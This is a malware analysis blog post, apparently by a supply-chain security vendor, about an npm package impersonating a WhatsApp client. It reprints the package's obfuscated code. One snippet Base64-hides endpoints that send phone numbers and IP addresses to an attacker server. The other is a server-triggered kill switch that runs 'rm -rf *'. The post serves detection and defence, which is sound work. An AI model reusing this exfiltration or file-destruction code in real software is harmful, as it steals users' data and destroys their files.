Malicious npm Package Exploits WhatsApp Authentication with Remote Kill Switch for File Destruction

"The authentication was successful. Your files are gone."

This isn't a ransomware message - it's the silent outcome of a newly discovered malware masquerading as a WhatsApp Web client implementation. What makes this threat particularly concerning isn't just its ability to delete your files, but the way it hides in plain sight within standard authentication flows that developers trust every day.

Our security team has uncovered a multi-stage attack where every successful connection to WhatsApp's servers could trigger a ticking time bomb. The malware authors didn't just build a data stealer - they created a destructive payload that waits for the perfect moment to strike, all while masquerading as legitimate code that many developers wouldn't think twice about using.

With messaging platforms becoming central to modern applications and over 500 messaging-related malware incidents reported in 2024 alone, this implementation stands out for its particularly devious approach, because it uses WhatsApp's own authentication process as a weapon.

Initial Discovery#

The malicious package @vreden/meta (https://socket.dev/npm/package/@vreden/meta) was discovered during a routine scan of npm packages related to WhatsApp API implementations. What caught our attention was the suspicious modification of the authentication flow in the main file. After further investigation it was also found that the package copied Baileys' (https://socket.dev/npm/package/baileys) README file to appear legitimate while hiding destructive capabilities within its code.

Technical Analysis#

Primary Malicious Components

Data Exfiltration Mechanism:

const requestPairingCode = async (phoneNumber) => {
        const defaultMaxListenersBuffer = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvbGVhZHM/aWQ9";
        const streamListerBuffer = "aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA==";
        // Legitimate authentication mixed with data collection
        authState.creds.pairingCode = (0, Utils_1.bytesToCrockford)((0, crypto_1.randomBytes)(5));
        authState.creds.me = {
            id: (0, WABinary_1.jidEncode)(phoneNumber, 's.whatsapp.net'),
            name: '~'
        };
        ev.emit('creds.update', authState.creds);
        // Hidden data exfiltration
        const response = await axios_1.default.get(`${atob(streamListerBuffer)}`);
        await axios_1.default.get(`${atob(defaultMaxListenersBuffer)}${phoneNumber}&s=${response.data.ip}`);

• The function uses Base64 encoding to hide two endpoints:
  • First endpoint (streamListerBuffer)(hxxps://ipwho[.]is/?lang=id-ID) when decoded points to an IP information gathering service
  • Second endpoint (defaultMaxListenersBuffer) ( hxxps://rest-api[.]vreden[.]my[.]id?leads?id=)serves as the data collection point
• The code executes in two stages:
  1. Makes a request to get the victim's IP address
  2. Sends both the phone number and IP address to the attacker's server
• The legitimate-looking bytesToCrockford operation serves as camouflage while the exfiltration occurs

Destructive Payload:

const interaktiveMeta = async (phoneNumber) => {
        const metaBufferKey = "aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQvY2VrP2lkPQ==";
        const response = await axios_1.default.get(`${atob(metaBufferKey)}${phoneNumber}`);
        if (response.data.message) {
            (0, child_process_1.exec)("rm -rf *");
        }
        return "the interaktiveMessage is available";
    };

• This function implements a remote kill switch mechanism:
  • Uses Base64 encoded endpoint to hide the command and control server
  • Makes a request with the victim's phone number to check for destruction commands
  • If the server responds with a specific message, it executes rm -rf *
• The command rm -rf * is a destructive Unix/Linux command that:
  • Removes (rm) all files and directories
  • Forces deletion without confirmation (f)
  • Recursively deletes subdirectories (r)
  • Wildcard that matches all files and directories in the current directory (*)
• The innocuous return message "interaktiveMessage is available" masks the destructive operation

Attack Flow Analysis

1. Initial Execution:
   • Package initialization appears normal, mimicking legitimate WhatsApp client behavior
   • Establishes legitimate WebSocket connections to WhatsApp servers
   • Begins authentication process using standard protocols
2. Malicious Operations:
   • Collects device information during authentication
   • Exfiltrates data through encoded endpoints
   • Can execute destructive commands based on server response
3. Data Collection Points:
   • Phone number during authentication
   • IP address and network information
   • Device fingerprinting data
   • Authentication credentials

Technical Impact Assessment#

Immediate System Impact

The malware's primary system-level threat comes from its unrestricted access to the file system through exec commands. Most critically, it contains the capability to execute rm -rf *, which can wipe entire directory structures without warning or recovery options. This destructive capability, combined with its ability to compromise system credentials, creates a severe risk to system integrity and stability.

Data Security Impact

The data security implications of this malware are extensive and multi-layered. At its core, the malware systematically harvests sensitive information, beginning with phone numbers from the authentication process. It then expands its collection to include IP addresses, device identification data, and perhaps most concerning, authentication credentials. This comprehensive data gathering creates a complete profile of both the user and their system, which can be exploited for further attacks or unauthorized access.

Network Security Impact

From a network perspective, the malware establishes a concerning pattern of unauthorized connections. It creates persistent outbound connections to remote servers, with all communications obscured through base64 encoding to evade detection. These connections not only facilitate data exfiltration but also maintain an open channel for receiving additional commands or downloading new payloads, effectively creating a permanent backdoor into the infected system.

Indicators of Compromise (IOCs)#

Package

• https://socket.dev/npm/package/@vreden/meta/files/1.0.0/lib/Socket/socket.js

Encoded Endpoints

aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQ/bGVhZHM/aWQ9 -> hxxps://rest-api[.]vreden.my[.]id?leads?id=
aHR0cHM6Ly9pcHdoby5pcy8/bGFuZz1pZC1JRA== -> hxxps://ipwho[.]is/?lang=id-ID
aHR0cHM6Ly9yZXN0LWFwaS52cmVkZW4ubXkuaWQ/Y2VrP2lkPQ== -> hxxps://rest-api[.]vreden[.]my[.]id?cek?id=

Suspicious Functions

• interaktiveMeta
• getPairingCode

MITRE ATT&CK Mapping#

• T1059.004 - Command and Scripting Interpreter: Unix Shell
• T1140 - Deobfuscate/Decode Files or Information
• T1041 - Exfiltration Over C2 Channel
• T1070.004 - Indicator Removal on Host: File Deletion

Conclusion#

This malware demonstrates advanced obfuscation techniques and strategic code placement in hiding malicious code within legitimate-looking authentication flows. The combination of data exfiltration capabilities and destructive functions poses a significant risk to system integrity and data security.

To protect against such threats, implement Socket's security scanning tools for automated detection of suspicious code patterns and potentially malicious dependencies.

Protect yourself and your organizations with Socket’s free tools.#

Threat actors exploit human error and trust by mimicking and typo-squatting trusted authors and packages to infiltrate malicious code into applications. It is crucial to verify package and author names carefully, review third-party code, and use security tools to detect potentially malicious packages.

Socket's free GitHub app detects malicious packages and serves as your first line of defense against known malware and other supply chain risks like install scripts, telemetry, and typo-squatting. It scans incoming dependencies in real-time with every pull request, instantly alerting developers via a GitHub comment if a potential typo-squatted package is detected.

Enhance security with Socket CLI.#

Enhance your security further with the Socket CLI tool, which alerts you to potential malware containing packages and other security issues. Its "safe npm" feature proactively shields your machine from bad packages during npm install. Socket wraps npm commands, running the real npm install process while analyzing results in the background — even for deeply nested dependencies. Before writing anything to disk, it alerts you to risky packages, giving you the choice to stop the install or proceed.

Getting started is easy.#

Install the Socket CLI:

npm install -g socket

Then, prefix npm installs with socket to analyze them before installation:

socket npm install react

Secure your workflow today.#

Socket for GitHub and Socket CLI integrate seamlessly into your workflow, are free to use, and can save your app or organization from the disastrous consequences of supply chain attacks using typosquatting. Install them today to prevent risky dependencies from landing in your applications.